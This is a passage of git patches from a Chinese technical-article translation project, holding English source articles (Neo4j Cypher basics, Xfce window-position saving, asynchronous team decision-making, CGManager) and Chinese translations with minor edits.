thing.) You'll see something like this: + +### [article_2_image_2.jpg][3] + +![Visual graph](https://opensource.com/sites/default/files/u128651/article_2_image_2.jpg "Visual graph") + +Adding a relationship is a little bit trickier; you must have the nodes you want to connect "in scope," meaning within the scope of the current query. The variables we used earlier have gone out of scope, so let's find John and Jane and marry them: + +``` +MATCH (a:Person),(b:Person) WHERE a.name='Jane Doe' AND b.name='John Doe' CREATE (a)-[r:MARRIAGE {date: '2017-03-04', place: 'Houston, TX'}]->(b) +``` + +This query will set two properties and create one relationship. Re-running the MATCH query shows that relationship. You can point your mouse arrow at any of the nodes or relationships to see the properties for that item. + +Let's add the rest of the relationships. Rather than doing a bunch of MATCH statements, I'm going to do it once and CREATE multiple relationships from them. + +``` +MATCH (a:Person),(b:Person),(c:Person),(d:Person),(e:Person),(f:Person),(t:City),(u:City),(v:City),(w:City) WHERE a.name='Jane Doe' AND b.name='John Doe' AND c.name='Mary Smith' AND d.name='Robert Roe' AND e.name='Rhonda Roe' AND f.name='Ryan Roe' AND t.name='Petaluma, CA' AND u.name='Cypress, TX' AND v.name='Grand Prairie, TX' AND w.name='Houston, TX' CREATE (d)-[m2:MARRIAGE {date: '1990-12-01', place: 'Chicago, IL'}]->(e) CREATE (a)-[n:CHILD]->(c) CREATE (d)-[n2:CHILD]->(f) CREATE (e)-[n3:CHILD]->(f) CREATE (b)-[n4:STEPCHILD]->(c) CREATE (a)-[o:BORN_IN]->(v) CREATE (b)-[o2:BORN_IN]->(t) CREATE (c)-[p:DATING]->(f) CREATE (a)-[q:LIVES_IN]->(u) CREATE (b)-[q1:LIVES_IN]->(u) CREATE (a)-[r:WORKS_IN]->(w) CREATE (a)-[s:FRIEND]->(d) CREATE (a)-[s2:FRIEND]->(e) +``` + +Re-query with the MATCH statement, and you should have a graph like this: + +### [article_2_image_3.jpg][4] + +![Graph after re-querying with MATCH](https://opensource.com/sites/default/files/u128651/article_2_image_3.jpg "Graph after re-querying with MATCH") + +If you want, you can drag the nodes around and end up with the same graph as my drawing from before. + +In this example, the only MATCH we've done is to MATCH everything. Here's a query that will return the two married couples and show the relationship between them: + +``` +MATCH (a)-[b:MARRIAGE]->(c) RETURN a,b,c +``` + +With a more elaborate graph, you could do much more detailed searching. For instance, if you had a graph of Movie and Person nodes, and the relationships were roles like ACTED IN, DIRECTED, WROTE SCREENPLAY, and so forth, you could do queries like this: + +``` +MATCH (p:Person { name: 'Mel Gibson' })--(m:Movie) RETURN m.title +``` + +...and get back a list of films connected to Mel Gibson in any way. But if you only wanted movies where he was an actor, this query would be more useful: + +``` +MATCH (p:Person { name: 'Mel Gibson' })-[r:ACTED_IN]->(m:movie) RETURN m.title,r.role +``` + +Fancier Cypher queries are possible, of course, and we're just scratching the surface here. The full documentation for the Cypher language is available [at the Neo4j website][12], and it has lots of examples to work with. + +In the next article in this series, we'll write a little Perl script to create this same graph to show how to use graph databases in an application. + + +### About the author + +Ruth Holloway - Ruth Holloway has been a system administrator and software developer for a long, long time, getting her professional start on a VAX 11/780, way back when. She spent a lot of her career (so far) serving the technology needs of libraries, and has been a contributor since 2008 to the Koha open source library automation suite.Ruth is currently a Perl Developer at cPanel in Houston, and also serves as chief of staff for an obnoxious cat. In her copious free time, she occasionally reviews old romance... [more about Ruth Holloway][6] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/7/neo4j-graph-databases-getting-started + +作者:[Ruth Holloway ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/druthb +[1]:https://opensource.com/file/363066 +[2]:https://opensource.com/file/363061 +[3]:https://opensource.com/file/363071 +[4]:https://opensource.com/file/363076 +[5]:https://opensource.com/article/17/7/neo4j-graph-databases-getting-started?rate=hqfP7Li5t_MqS9sV0FXwGAC0fVBoBXOglypRL7c-Zn4 +[6]:https://opensource.com/users/druthb +[7]:https://opensource.com/user/36051/feed +[8]:https://opensource.com/article/17/7/fundamentals-graph-databases-neo4j +[9]:https://neo4j.com/ +[10]:https://neo4j.com/download/community-edition/ +[11]:http://debian.neo4j.org/?_ga=2.172102506.853767004.1499179137-1089522652.1499179137 +[12]:https://neo4j.com/docs/developer-manual/current/cypher/ +[13]:https://opensource.com/users/druthb +[14]:https://opensource.com/users/druthb +[15]:https://opensource.com/users/druthb +[16]:https://opensource.com/tags/programming From 25173e9f25bcdc8b2f0002eb1596e6c5d3819d4c Mon Sep 17 00:00:00 2001 From: happygeorge01 Date: Mon, 18 Dec 2017 14:07:12 +0800 Subject: [PATCH 0686/1627] Update 20170717 Neo4j and graph databases Getting started.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 翻译中 --- .../tech/20170717 Neo4j and graph databases Getting started.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170717 Neo4j and graph databases Getting started.md b/sources/tech/20170717 Neo4j and graph databases Getting started.md index c14933a435..00f9c88280 100644 --- a/sources/tech/20170717 Neo4j and graph databases Getting started.md +++ b/sources/tech/20170717 Neo4j and graph databases Getting started.md @@ -1,3 +1,5 @@ +happygeorge01 is translating + Neo4j and graph databases: Getting started ============================================================ From 1704d3604fa124342f0d1d23e690decf0c4a69cb Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 18 Dec 2017 17:16:05 +0800 Subject: [PATCH 0687/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2018=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=B8=80=2017:16:0?= =?UTF-8?q?5=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Saving window position in Xfce session.md | 73 ------------------- ... Saving window position in Xfce session.md | 68 +++++++++++++++++ 2 files changed, 68 insertions(+), 73 deletions(-) delete mode 100644 sources/tech/20171216 Saving window position in Xfce session.md create mode 100644 translated/tech/20171216 Saving window position in Xfce session.md diff --git a/sources/tech/20171216 Saving window position in Xfce session.md b/sources/tech/20171216 Saving window position in Xfce session.md deleted file mode 100644 index 6c1d2c4139..0000000000 --- a/sources/tech/20171216 Saving window position in Xfce session.md +++ /dev/null @@ -1,73 +0,0 @@ -translating by lujun9972 -Saving window position in Xfce session -====== - -TLDR: If you're having problems saving window position in your Xfce session, enable save on logout and then log out and back in. This will probably fix the problem (permanently, if you like keeping the same session and turn saving back off again). See below for the details. - -I've been using Xfce for my desktop for some years now, and have had a recurring problem with saved sessions after a reboot. After logging in, all the applications from my saved session would be started, but all the workspace and window positioning data would be lost, so they'd just pile onto the default workspace like a train wreck. - -Various other people on-line have reported this over the years (there are open bugs in Ubuntu, Xfce, and Red Hat bug trackers), and there was apparently a related bug fixed in Xfce 4.10, but I'm using 4.12. I would have given up (and have several times in the past), except that on one of my systems this works correctly. All the windows go back to their proper positions. - -Today, I dug into the difference and finally solved it. Here it is, in case someone else stumbles across it. - -Some up-front caveats that are or may be related: - - 1. I rarely log out of my Xfce session, since this is a single-user laptop. I hibernate and keep restoring until I decide to do a reboot for kernel patches, or (and this is somewhat more likely) some change to the system invalidates the hibernate image and the system hangs on restore from hibernate and I force-reboot it. I also only sometimes use the Xfce toolbar to do a reboot; often, I just run `reboot`. - - 2. I use xterm and Emacs, which are not horribly sophisticated X applications and which don't remember their own window positioning. - - - - -Xfce stores sessions in `.cache/sessions` in your home directory. The key discovery on close inspection is that there were two types of files in that directory on the working system, and only one on the non-working system. - -The typical file will have a name like `xfce4-session-hostname:0` and contains things like: -``` -Client9_ClientId=2a654109b-e4d0-40e4-a910-e58717faa80b -Client9_Hostname=local/hostname -Client9_CloneCommand=xterm -Client9_RestartCommand=xterm,-xtsessionID,2a654109b-e4d0-40e4-a910-e58717faa80b -Client9_Program=xterm -Client9_UserId=user - -``` - -This is the file that remembers all of the running applications. If you go into Settings -> Session and Startup and clear the session cache, files like this will be deleted. If you save your current session, a file like this will be created. This is how Xfce knows to start all of the same applications. But notice that nothing in the above preserves the positioning of the window. (I went down a rabbit hole thinking the session ID was somehow linking to that information elsewhere, but it's not.) - -The working system had a second type of file in that directory named `xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state`. Looking in that file reveals entries like: -``` -[CLIENT] 0x200000f - [CLIENT_ID] 2a9e5b8ed-1851-4c11-82cf-e51710dcf733 - [CLIENT_LEADER] 0x200000f - [RES_NAME] xterm - [RES_CLASS] XTerm - [WM_NAME] xterm - [WM_COMMAND] (1) "xterm" - [GEOMETRY] (860,35,817,1042) - [GEOMETRY-MAXIMIZED] (860,35,817,1042) - [SCREEN] 0 - [DESK] 2 - [FLAGS] 0x0 - -``` - -Notice the geometry and desk, which are exactly what we're looking for: the window location and the workspace it should be on. So the problem with window position not being saved was the absence of this file. - -After some more digging, I discovered that while the first file is saved when you explicitly save your session, the second is not. However, it is saved on logout. So, I went to Settings -> Session and Startup and enabled automatically save session on logout in the General tab, logged out and back in again, and tada, the second file appeared. I then turned saving off again (since I set up my screens and then save them and don't want any subsequent changes saved unless I do so explicitly), and now my window position is reliably restored. - -This also explains why some people see this and others don't: some people probably regularly use the Log Out button, and others ignore it and manually reboot (or just have their system crash). - -Incidentally, this sort of problem, and the amount of digging that I had to do to solve it, is the reason why I'm in favor of writing man pages or some other documentation for every state file your software stores. Not only does it help people digging into weird problems, it helps you as the software author notice surprising oddities, like splitting session state across two separate state files, when you go to document them for the user. - - --------------------------------------------------------------------------------- - -via: https://www.eyrie.org/~eagle/journal/2017-12/001.html - -作者:[J. R. R. Tolkien][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.eyrie.org diff --git a/translated/tech/20171216 Saving window position in Xfce session.md b/translated/tech/20171216 Saving window position in Xfce session.md new file mode 100644 index 0000000000..e57a667ccb --- /dev/null +++ b/translated/tech/20171216 Saving window position in Xfce session.md @@ -0,0 +1,68 @@ +在 Xfce 会话中保存窗口的位置 +====== +摘要:如果你发现 Xfce session 不能保存窗口的位置,那么启用 `save on logout` 然后登出再进来一次,可能就能修复这个问题了 (permanently, if you like keeping the same session and turn saving back off again)。 下面是详细内容。 + +我用 Xfce 作桌面有些年头了,但是每次重启后进入之前保存的 session 时总会有问题出现。 登陆后, 之前 session 中保存的应用都会启动, 但是所有的工作区和窗口位置数据会丢失, 导致所有应用都堆在默认工作区中,乱糟糟的。 + +多年来,很多人都报道过这个问题( Ubuntu, Xfce, 以及 Red Hat 的 bug 追踪系统中都有登记这个 bug)。 虽然 Xfce4.10 中已经修复过了一个相关 bug, 但是我用的 Xfce4.12 依然有这个问题。 如果不是我的其中一个系统能够正常的回复各个窗口的位置,我几乎都要放弃找出问题的原因了(事实上我之前已经放弃过很多次了)。 + +今天,我深入对比了两个系统的不同点,最终解决了这个问题。 我现在就把结果写出来, 以防有人也遇到相同的问题。 + +提前的一些说明: + + 1。由于这个笔记本只有我在用,因此我几乎不登出我的 Xfce session。 我一般只是休眠然后唤醒,除非由于要对内核打补丁才进行重启, 或者由于某些改动损毁了休眠镜像导致系统从休眠中唤醒时卡住了而不得不重启。 另外,我也很少使用 Xfce 工具栏上的重启按钮重启; 一般我只是运行一下 `reboot`。 + + 2。我会使用 xterm 和 Emacs, 这些 X 应用写的不是很好,无法记住他们自己的窗口位置。 + +Xfce 将 sessions 信息保存到主用户目录中的 `.cache/sessions` 目录中。在经过仔细检查后发现,在正常的系统中有两类文件存储在该目录中,而在非正常的系统中,只有一类文件存在该目录下。 + +其中一类文件的名字类似 `xfce4-session-hostname:0` 这样的,其中包含的内容类似下面这样的: +``` +Client9_ClientId=2a654109b-e4d0-40e4-a910-e58717faa80b +Client9_Hostname=local/hostname +Client9_CloneCommand=xterm +Client9_RestartCommand=xterm,-xtsessionID,2a654109b-e4d0-40e4-a910-e58717faa80b +Client9_Program=xterm +Client9_UserId=user + +``` + +这个文件记录了所有正在运行的程序。如果你进入 Settings -> Session and Startup 并清除 session 缓存, 就会删掉这种文件。 当你保存当前 session 时, 又会创建这种文件。 这就是 Xfce 知道要启动哪些应用的原因。 但是请注意,上面并没有包含任何窗口位置的信息。 (我还曾经以为可以根据 session ID 来找到其他地方的一些相关信息,但是失败了)。 + +正常工作的系统在目录中还有另一类文件,名字类似 `xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state` 这样的。 其中文件内容类似下面这样: +``` +[CLIENT] 0x200000f + [CLIENT_ID] 2a9e5b8ed-1851-4c11-82cf-e51710dcf733 + [CLIENT_LEADER] 0x200000f + [RES_NAME] xterm + [RES_CLASS] XTerm + [WM_NAME] xterm + [WM_COMMAND] (1) "xterm" + [GEOMETRY] (860,35,817,1042) + [GEOMETRY-MAXIMIZED] (860,35,817,1042) + [SCREEN] 0 + [DESK] 2 + [FLAGS] 0x0 + +``` + +注意这里的 geometry 和 desk 记录的正是我们想要的窗口位置以及工作区号。因此不能保存窗口位置的原因就是因为缺少这个文件。 + +继续深入下去,我发现当你明确地手工保存 sessino 时,智慧保存第一个文件而不会保存第二个文件。 但是当登出保存 session 时则会保存第二个文件。 因此, 我进入 Settings -> Session and Startup 中,在 Genral 标签页中启用登出时自动保存 session, 然后登出后再进来, 然后 tada, 第二个文件出现了。 再然后我又关闭了登出时自动保存 session。( 因为我一般在排好屏幕后就保存一个 session, 但是我不希望做出的改变也会影响到这个保存的 session, 如有必要我会明确地手工进行保存), 现在 我的窗口位置能够正常的回复了。 + +这也解释了为什么有的人会有问题而有的人没有问题: 有的人可能一直都是用登出按钮重启,而有些人则是手工重启(或者仅仅是由于系统漰溃了才重启)。 + +顺带一提,这类问题, 以及为解决问题而付出的努力正是我赞同为软件存储的状态文件编写 man 页或其他类似文档的原因。 为用户编写文档,不仅能帮助别人深入挖掘产生奇怪问题的原因, 也能让软件作者注意到软件中那些奇怪的东西, 比如将 session 状态存储到两个独立的文件中去。 + + +-------------------------------------------------------------------------------- + +via: https://www.eyrie.org/~eagle/journal/2017-12/001.html + +作者:[J. R. R. Tolkien][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.eyrie.org From 47d929f554af28336b406299625317114ceecb42 Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 18 Dec 2017 17:22:21 +0800 Subject: [PATCH 0688/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2018=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=B8=80=2017:22:2?= =?UTF-8?q?1=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...on-making- Helping remote teams succeed.md | 57 +++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 sources/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md diff --git a/sources/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md b/sources/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md new file mode 100644 index 0000000000..e81a06796d --- /dev/null +++ b/sources/tech/20171212 Asynchronous decision-making- Helping remote teams succeed.md @@ -0,0 +1,57 @@ +translating by lujun9972 +Asynchronous decision-making: Helping remote teams succeed +====== +Asynchronous decision-making is a strategy that enables geographically and culturally distributed software teams to make decisions more efficiently. In this article, I'll discuss some of the principles and tools that make this approach possible. + +Synchronous decision-making, in which participants interact with each other in real time, can be expensive for people who work on a [Maker's Schedule][1], and they are often impractical for remote teams. We've all seen how such meetings can devolve into inefficient time wasters that we all dread and avoid. + +In contrast, asynchronous decision-making, which is often used in large open source projects--for example, at the Apache Software Foundation (ASF), where I'm most active--provides an efficient way for teams to move forward with minimal meetings. Many open source projects involve only a few meetings each year (and some none at all), yet development teams consistently produce high-quality software. + +How does asynchronous decision-making work? + +## Required tools + +### Central asynchronous communications channel + +The first thing you need to enable asynchronous decision-making is a central asynchronous communications channel. The technology you use must enable all team members to get the same information and hold threaded discussions, where you can branch off on a topic while ignoring other topics being discussed on the same channel. Think of marine radio, in which a broadcast channel is used sparingly to get the attention of specific people, who then branch off to a sub-channel to have more detailed discussions. + +Many open source projects still use mailing lists as this central channel, although younger software developers might consider this approach old and clunky. Mailing lists require a lot of discipline to efficiently manage the high traffic of a busy project, particularly when it comes to meaningful quoting, sticking to one topic per thread, and making sure [subject lines are relevant][2]. Still, when used properly and coupled with an indexed archive, mailing lists remain the most ubiquitous tool to create a central channel. + +Corporate teams might benefit from more modern collaboration tools, which can be easier to use and provide stronger multimedia features. Regardless of which tools you use, the key is to create a channel in which large groups of people can communicate efficiently and asynchronously on a wide variety of topics. A [busy channel is often preferable to multiple channels][3] to create a consistent and engaged community. + +### Consensus-building mechanism + +The second tool is a mechanism for building consensus so you can avoid deadlocks and ensure that decisions go forward. Unanimity in decision-making is ideal, but consensus, defined as "widespread agreement among people who have decision power," is second-best. Requiring unanimity or allowing vetoes in decision-making can block progress, so at the ASF vetoes apply only to a very limited set of decision types. The [ASF's voting rules][4] constitute a well-established and often-emulated approach to building consensus in loosely coupled teams which, like the ASF, may have no single boss. They can also be used when consensus doesn't emerge naturally. + +### Case management system + +Building consensus usually happens on the project's central channel, as described above. But for complex topics, it often makes sense to use a third tool: a case management system. Groups can then focus the central channel on informal discussions and brainstorming, then move to a more structured case management system when a discussion evolves into a decision. + +The case management system organizes decisions more precisely. Smaller teams with fewer decisions to make could work without one, but many find it convenient to be able to discuss the details of a given decision and keep associated information in a single, relatively isolated place. + +A case management system does not require complex software; at the ASF we use simple issue trackers, web-based systems originally created for software support and bug management. Each case is handled on a single web page, with a history of comments and actions. This approach works well for keeping track of decisions and the paths that lead to them. Some non-urgent or complex decisions can take a long time to reach closure, for example, and it's useful to have their history in a single place. New team members can also get up to speed quickly by learning which decisions were made most recently, which remain outstanding, who's involved in each one, and the background behind each decision. + +## Success stories + +The nine members of ASF's board of directors make a few dozen decisions at each monthly phone meeting, which last less than two hours. We carefully prepare for these meetings by making most of our decisions asynchronously in advance. This allows us to focus the meeting on the complex or uncertain issues rather than the ones that already have full or partial consensus. + +An interesting example outside of the software world is the [Swiss Federal Council's weekly meeting][5], which runs in a way similar to ASF. Teams prepare for the meeting by using asynchronous decision-making to build consensus. The meeting agenda consists of a set of color-coded lists that indicate which items can be approved quickly, which need more discussion, and which are expected to be most complex. This allows seven busy people to make more than 2,500 decisions each year, in about 50 weekly sessions of a few hours each. Sounds pretty efficient to me. + +In my experience, the benefits of asynchronous decision-making are well worth the investment in time and tools. It also leads to happier team members, which is a key component of success. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/asynchronous-decision-making + +作者:[Bertrand Delacretaz][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com +[1]:http://www.paulgraham.com/makersschedule.html +[2]:https://grep.codeconsult.ch/2017/11/10/large-mailing-lists-survival-guide/ +[3]:https://grep.codeconsult.ch/2011/12/06/stefanos-mazzocchis-busy-list-pattern/ +[4]:http://www.apache.org/foundation/voting.html +[5]:https://www.admin.ch/gov/en/start/federal-council/tasks/decision-making/federal-council-meeting.html From f9f5d44390f566d5140e4afab1d204987701a25f Mon Sep 17 00:00:00 2001 From: imquanquan Date: Mon, 18 Dec 2017 19:06:48 +0800 Subject: [PATCH 0689/1627] translated --- ...oard Shortcuts You Might Not Know About.md | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md b/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md index 8e2b47f6a9..c313a63897 100644 --- a/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md +++ b/translated/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md @@ -1,10 +1,10 @@ -你可能不知道你的实用 GNOME Shell 快捷键 +你可能不知道却实用的 GNOME Shell 快捷键 ======================================= -由于 Ubuntu 在 17.10 版本转移到了 GNOME Shell,许多用户可能对挖掘最有用的快捷键和如何创建自己的快捷键感兴趣。这篇文章将同时介绍这两者。 +由于 Ubuntu 在 17.10 发行版本中转移到了 GNOME Shell,许多用户可能对那些实用的快捷键以及创建自己的快捷键感兴趣。这篇文章就是介绍这两方面的。 -现有的 GNOME Shell 快捷键使你的生活更加便捷 +使你的生活更加便捷的现有 GNOME Shell 快捷键 ========================================== -如果你希望 GNOME 发布成百上千种快捷键,你会失望地发现,情况并非如此。快捷键的列表不会太长,而且并不是全部都对你有用,但仍然会有许多快捷键可以用得上的。 +如果你希望 GNOME 有成百上千种快捷键,你会失望地发现,情况并非如此。快捷键的列表不会太长,而且并不是全部都对你有用,但仍然会有许多快捷键可以用得上的。 ![gnome-shortcuts-02-change-shortcut][3] @@ -14,12 +14,12 @@ * `Ctrl` + `Alt` + `T` - 这是一个用来启动终端的快捷键组合,你可以在 GNOME 的任何地方使用它。 -我个人经常使用的快捷键是: +我个人经常使用的两个快捷键是: * `Alt` + `F4` - 关闭最顶层端口 * `Alt` + `F8` - 调整窗口大小 -大多数人都知道如何用 `Alt` + `Tab` 在打开的应用程序之间切换,但是你可能不知道可以使用 `Alt` + `Shift` + `Tab` 在应用程序之间反方向切换。 +大多数人都知道如何用 `Alt` + `Tab` 在打开的应用程序窗口之间,但是你可能不知道可以使用 `Alt` + `Shift` + `Tab` 在应用程序窗口之间进行反方向切换。 在切换窗口界面时,另一个有用的组合键是 `Alt` + `Tab` 键上面的一个键。(例如:在 US 键盘布局中是: `Alt` + `` ` `` ) @@ -32,14 +32,14 @@ 如果在这些快捷键中加上 `Shift` ,例如 `Shift` + `Ctrl` + `Alt` + `Left`,则可以把当前窗口移动到其他工作区。 -我另一个最喜欢的键盘快捷键是辅助功能中的调整文字大小。你可以用 `Ctrl` + `+` (或 `Ctrl` + `-` )快速缩放字体大小。在某些情况下,这个快捷键可能默认是禁用的,所以在尝试之前请先检查一下。 +另一个我最喜欢是辅助功能中的调整文字大小的快捷键。你可以用 `Ctrl` + `+` (或 `Ctrl` + `-` )快速缩放字体大小。在某些情况下,这个快捷键可能默认是禁用的,所以在尝试之前请先检查一下。 -上述是一些鲜为人知但是十分有用的键盘快捷键。如果你想知道更多有用的快捷键,可以查看[官方 GNOME Shell 快捷键列表][2]。 +上述是一些鲜为人知但是十分实用的键盘快捷键。如果你想知道更多实用的快捷键,可以查看[官方 GNOME Shell 快捷键列表][2]。 如何创建自己的 GNOME Shell 快捷键 ================================= -如果默认的快捷键不符合您的喜好,可以更改它们或创建新的快捷键。你可以同样通过过菜单“设置 -> 设备 -> 键盘“完成这些操作。当你选择你想更改的快捷键条目,下面的对话框就会弹出。 +如果默认的快捷键不符合您的喜好,可以更改它们或创建新的快捷键。你同样可以通过菜单“设置 -> 设备 -> 键盘“完成这些操作。当你选择想更改的快捷键条目时,下面的对话框就会弹出。 输入你想要的键盘快捷键组合。 @@ -55,7 +55,7 @@ ![gnome-shortcuts-04-add-custom-shortcut][5] -GNOME 默认情况下并没有提供大量的 shell 快捷键,上面列出的是一些比较有用的快捷键。如果这些快捷键对你来说不够,你可以随时创建自己的快捷键。 +GNOME 默认情况下并没有提供大量的 shell 快捷键,上面列出的是一些比较实用的快捷键。如果这些快捷键对你来说不够,你可以随时创建自己的快捷键。 -------------------------------------------------------------------------------- From 972047ad23da07388c1c861e8168535c6e292f94 Mon Sep 17 00:00:00 2001 From: Ezio Date: Mon, 18 Dec 2017 20:47:10 +0800 Subject: [PATCH 0690/1627] =?UTF-8?q?20171218-1=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171218 Whats CGManager.md | 70 ++++++++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 sources/tech/20171218 Whats CGManager.md diff --git a/sources/tech/20171218 Whats CGManager.md b/sources/tech/20171218 Whats CGManager.md new file mode 100644 index 0000000000..af2eb7673e --- /dev/null +++ b/sources/tech/20171218 Whats CGManager.md @@ -0,0 +1,70 @@ +What's CGManager?[][1] +============================================================ + +CGManager is a central privileged daemon that manages all your cgroups for you through a simple D-Bus API. It's designed to work with nested LXC containers as well as accepting unprivileged requests including resolving user namespaces UIDs/GIDs. + +# Components[][2] + +### cgmanager[][3] + +This daemon runs on the host, mounts cgroupfs into a separate mount namespace (so it's invisible from the host), binds /sys/fs/cgroup/cgmanager/sock for incoming D-Bus queries and generally handles all clients running directly on the host. + +cgmanager accepts both authentication requests using D-Bus + SCM credentials used for translation of uid, gid and pid across namespaces or using simple "unauthenticated" (just the initial ucred) D-Bus for queries coming from the host level. + +### cgproxy[][4] + +You may see this daemon run in two cases. On the host if your kernel is older than 3.8 (doesn't have pidns attach support) or in containers (where only cgproxy runs). + +cgproxy doesn't itself do any cgroup configuration change but instead as its name indicates, proxies requests to the main cgmanager process. + +This is necessary so a process may talk to /sys/fs/cgroup/cgmanager/sock using straight D-Bus (for example using dbus-send). + +cgproxy will then catch the ucred from that query and do an authenticated SCM query to the real cgmanager socket, passing the arguments through ucred structs so that they get properly translated into something cgmanager in the host namespace can understand. + +### cgm[][5] + +A simple command line tool which talks to the D-Bus service and lets you perform all the usual cgroup operations from the command line. + +# Communication protocol[][6] + +As mentioned above, cgmanager and cgproxy use D-Bus. It's recommended that external clients (so not cgproxy itself) use the standard D-Bus API and do not attempt to implement the SCM creds protocol as it's unnecessary and easy to get wrong. + +Instead, simply assume that talking to /sys/fs/cgroup/cgmanager/sock will always do the right thing. + +The cgmanager API is only available on that separate D-Bus socket, cgmanager itself doesn't attach to the system bus and so a running dbus daemon isn't a requirement of cgmanager/cgproxy. + +You can read more about the D-Bus API [here][7]. + +# Licensing[][8] + +CGManager is free software, most of the code is released under the terms of the GNU LGPLv2.1+ license, some binaries are released under the GNU GPLv2 license. + +The default license for the project is the GNU LGPLv2.1+. + +# Support[][9] + +CGManager's stable release support relies on the Linux distributions and their own commitment to pushing stable fixes and security updates. + +Commercial support for CGManager on Ubuntu LTS releases can be obtained from [Canonical Ltd][10]. + +-------------------------------------------------------------------------------- + +via: https://linuxcontainers.org/cgmanager/introduction/ + +作者:[Canonical Ltd. ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.canonical.com/ +[1]:https://linuxcontainers.org/cgmanager/introduction/#whats-cgmanager +[2]:https://linuxcontainers.org/cgmanager/introduction/#components +[3]:https://linuxcontainers.org/cgmanager/introduction/#cgmanager +[4]:https://linuxcontainers.org/cgmanager/introduction/#cgproxy +[5]:https://linuxcontainers.org/cgmanager/introduction/#cgm +[6]:https://linuxcontainers.org/cgmanager/introduction/#communication-protocol +[7]:https://linuxcontainers.org/cgmanager/dbus-api/ +[8]:https://linuxcontainers.org/cgmanager/introduction/#licensing +[9]:https://linuxcontainers.org/cgmanager/introduction/#support +[10]:http://www.canonical.com/ From a9e3dc33fc30777ee9e829e62ac817613276af76 Mon Sep 17 00:00:00 2001 From: Ocputs <15391606236@163.com> Date: Mon, 18 Dec 2017 22:32:14 +0800 Subject: [PATCH 0691/1627] Octpus ---- Compression --- ...214 How to squeeze the most out of Linux file compression.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171214 How to squeeze the most out of Linux file compression.md b/sources/tech/20171214 How to squeeze the most out of Linux file compression.md index 3993944206..0d573d3261 100644 --- a/sources/tech/20171214 How to squeeze the most out of Linux file compression.md +++ b/sources/tech/20171214 How to squeeze the most out of Linux file compression.md @@ -1,3 +1,5 @@ + Translating ---> Octopus + How to squeeze the most out of Linux file compression ====== If you have any doubt about the many commands and options available on Linux systems for file compression, you might want to take a look at the output of the **apropos compress** command. Chances are you'll be surprised by the many commands that you can use for compressing and decompressing files, as well as for comparing compressed files, examining and searching through the content of compressed files, and even changing a compressed file from one format to another (i.e., .z format to .gz format). From 20cbbed932dd3b910049b2d0e6ced0e7fd66ef7d Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 19 Dec 2017 07:30:52 +0800 Subject: [PATCH 0692/1627] =?UTF-8?q?PRF&PUB:20171204=20FreeCAD=20?= =?UTF-8?q?=E2=80=93=20A=203D=20Modeling=20and=20Design=20Software=20for?= =?UTF-8?q?=20Linux.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @geekpi --- ...3D Modeling and Design Software for Linux.md | 31 ++++++------------- 1 file changed, 10 insertions(+), 21 deletions(-) rename {translated/tech => published}/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md (84%) diff --git a/translated/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md b/published/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md similarity index 84% rename from translated/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md rename to published/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md index 1788a51f83..ebf13cb458 100644 --- a/translated/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md +++ b/published/20171204 FreeCAD – A 3D Modeling and Design Software for 